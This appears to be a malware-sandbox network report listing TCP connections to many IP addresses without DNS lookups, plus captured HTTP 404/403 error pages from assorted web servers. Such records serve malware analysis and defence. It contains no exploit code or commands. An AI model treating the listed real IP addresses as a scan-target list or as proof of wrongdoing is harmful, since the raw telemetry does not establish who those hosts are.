    Source: unknownTCP traffic detected without corresponding DNS query: 178.113.142.204
    Source: unknownTCP traffic detected without corresponding DNS query: 5.118.83.191
    Source: unknownTCP traffic detected without corresponding DNS query: 79.148.171.195
    Source: unknownTCP traffic detected without corresponding DNS query: 94.6.135.14
    Source: unknownTCP traffic detected without corresponding DNS query: 178.113.142.204
    Source: unknownTCP traffic detected without corresponding DNS query: 94.251.209.196
    Source: unknownTCP traffic detected without corresponding DNS query: 37.103.19.147
    Source: unknownTCP traffic detected without corresponding DNS query: 5.118.83.191
    Source: unknownTCP traffic detected without corresponding DNS query: 178.242.11.116
    Source: unknownTCP traffic detected without corresponding DNS query: 2.158.81.31
    Source: unknownTCP traffic detected without corresponding DNS query: 37.103.19.147
    Source: unknownTCP traffic detected without corresponding DNS query: 118.22.176.1
    Source: unknownTCP traffic detected without corresponding DNS query: 2.100.87.168
    Source: unknownTCP traffic detected without corresponding DNS query: 79.95.245.27
    Source: unknownTCP traffic detected without corresponding DNS query: 79.101.9.186
    Source: unknownTCP traffic detected without corresponding DNS query: 2.9.173.251
    Source: unknownTCP traffic detected without corresponding DNS query: 178.242.11.116
    Source: unknownTCP traffic detected without corresponding DNS query: 2.158.81.31
    Source: unknownTCP traffic detected without corresponding DNS query: 118.23.238.64
    Source: unknownTCP traffic detected without corresponding DNS query: 118.22.176.1
    Source: unknownTCP traffic detected without corresponding DNS query: 2.9.173.251
    Source: unknownTCP traffic detected without corresponding DNS query: 2.100.87.168
    Source: unknownTCP traffic detected without corresponding DNS query: 79.95.245.27
    Source: unknownTCP traffic detected without corresponding DNS query: 79.101.9.186
    Source: unknownTCP traffic detected without corresponding DNS query: 118.23.238.64
    Source: unknownTCP traffic detected without corresponding DNS query: 94.208.123.42
    Source: unknownTCP traffic detected without corresponding DNS query: 94.230.101.2
    Source: unknownTCP traffic detected without corresponding DNS query: 79.61.227.96
    Source: unknownTCP traffic detected without corresponding DNS query: 5.33.184.248
    Source: unknownTCP traffic detected without corresponding DNS query: 156.235.181.169
    Source: unknownTCP traffic detected without corresponding DNS query: 94.208.123.42
    Source: unknownTCP traffic detected without corresponding DNS query: 212.69.2.6
    Source: unknownTCP traffic detected without corresponding DNS query: 94.170.37.58
    Source: unknownTCP traffic detected without corresponding DNS query: 109.26.55.32
    Source: unknownTCP traffic detected without corresponding DNS query: 109.165.133.222
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: RomPager/4.07 UPnP/1.0
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 01:57:32 GMTServer: WebsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockCache-Control: no-storeContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-type: text/htmlContent-Length: 0Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Date: Thu, 01 Jan 1970 00:07:10 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sStrict-Transport-Security: max-age=31536000Connection: closeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 55 73 65 72 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 2e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 72 75 62 61 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 22 3e 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H4>404 Not Found</H4>User not allowed.<ADDRESS><A HREF="http://www.arubanetworks.com"></A></ADDRESS></BODY></HTML>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundReferrer-Policy: no-referrerServer: thttpdContent-Type: text/html; charset=utf-8Date: Sat, 14 May 2022 00:04:08 GMTLast-Modified: Sat, 14 May 2022 00:04:08 GMTAccept-Ranges: bytesConnection: closeCache-Control: no-cache,no-storeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 09 3c 68 31 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 68 65 69 67 68 74 3a 20 31 35 30 70 78 22 3e 0a 09 09 3c 73 70 61 6e 3e 0a 09 09 09 45 72 72 6f 72 20 34 30 34 2c 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a 09 09 3c 2f 73 70 61 6e 3e 0a 09 3c 2f 68 31 3e 0a 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 09 09 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 3c 2f 61 3e 0a 09 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 3c 48 52 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <html><head></head><body><h1 style="text-align: center; height: 150px"><span>Error 404, Page not found</span></h1><div style="text-align: center;"><a href="/">Home</a></div></body></html><HR></BODY></HTML>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 1064Date: Sat, 14 May 2022 00:04:12 GMTData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 May 2022 00:04:21 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: beegoServer:1.12.0Set-Cookie: beegosessionID=c581bad2464ea518c5b8ba8bb46299f7; Path=/; HttpOnlyDate: Sat, 14 May 2022 00:04:24 GMTContent-Length: 2001Content-Type: text/html; charset=utf-8Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 30 3b 0a 09 09 09 7d 0a 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 45 46 45 46 45 46 3b 0a 09 09 09 09 66 6f 6e 74 3a 20 2e 39 65 6d 20 22 4c 75 63 69 64 61 20 53 61 6e 73 20 55 6e 69 63 6f 64 65 22 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 7d 0a 0a 09 09 09 23 77 72 61 70 70 65 72 7b 0a 09 09 09 09 77 69 64 74 68 3a 36 30 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 34 30 70 78 20 61 75 74 6f 20 30 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 09 09 09 09 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 35 70 78 20 35 70 78 20 31 30 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 33 29 3b 0a 09 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 35 70 78 20 35 70 78 20 31 30 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 33 29 3b 0a 09 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 35 70 78 20 35 70 78 20 31 30 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 33 29 3b 0a 09 09 09 7d 0a 0a 09 09 09 23 77 72 61 70 70 65 72 20 68 31 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 23 46 46 46 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 23 77 72 61 70 70 65 72 20 61 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 2e 39 65 6d 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 23 46 46 46 3b 0a 09 09 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 36 30 30 70 78 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 35 70 78 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 6e 61 76 74 6f 70 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 34 30 70 78 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 May 2022 00:04:24 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/plainTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 345Date: Sat, 14 May 2022 00:04:28 GMTServer: lighttpd/1.4.45Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:04:32 GMTServer: Apache/2.2.16 (Debian)Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 241Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f c3 30 0c 85 ef fd 15 66 27 38 2c ee ca 84 38 44 91 c6 da 89 49 65 54 d0 1d 38 a6 8b 51 22 8d b4 24 1e 83 7f 4f da 09 89 8b a5 67 bf ef e9 59 5e 95 cf eb f6 ad a9 e0 b1 7d aa a1 d9 3f d4 db 35 cc e6 88 db aa dd 20 96 6d 79 b9 14 22 47 ac 76 33 95 49 cb 1f 47 25 2d 69 93 04 3b 3e 92 5a e6 4b d8 f5 0c 9b fe e4 8d c4 cb 32 93 38 99 64 d7 9b 9f 91 5b a8 7f 9e a4 32 39 a8 d6 12 04 fa 3c 51 64 32 b0 7f a9 01 9d 37 f4 2d 06 3b c0 59 47 f0 09 79 1f 11 e8 3d b0 75 11 22 85 2f 0a 42 e2 30 86 86 34 b4 31 81 62 54 ab 41 1f 2c 61 21 0a b1 b8 83 eb 92 3a a7 fd 0d bc 4e 00 68 86 33 75 73 77 2b 9c 67 e2 a0 85 27 86 a6 0f 0c f7 b9 c4 bf 90 54 7b 2a 9c 2a 8e 8f 66 bf ec de d9 64 23 01 00 00 Data Ascii: MAO0f'8,8DIeT8Q"$OgY^}?5 my"Gv3IG%-i;>ZK28d[29<Qd27-;YGy=u"/B041bTA,a!:Nh3usw+g'T{**fd#
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sat, 14 May 2022 00:04:32 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 01:04:34 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 May 2022 00:04:37 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 02:00:47 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.2Date: Sat, 14 May 2022 00:04:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 38 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 19 9a e8 19 21 2b d1 07 59 02 32 54 1f ea 40 00 da 1e 3f 07 a9 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 84(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!+Y2T@?0
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: CherryPy/8.9.1Date: Sat, 14 May 2022 00:04:53 GMTVary: Accept-EncodingContent-Encoding: gzipContent-Length: 174
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-type: text/htmlContent-Length: 0Connection: closeAuthInfo:
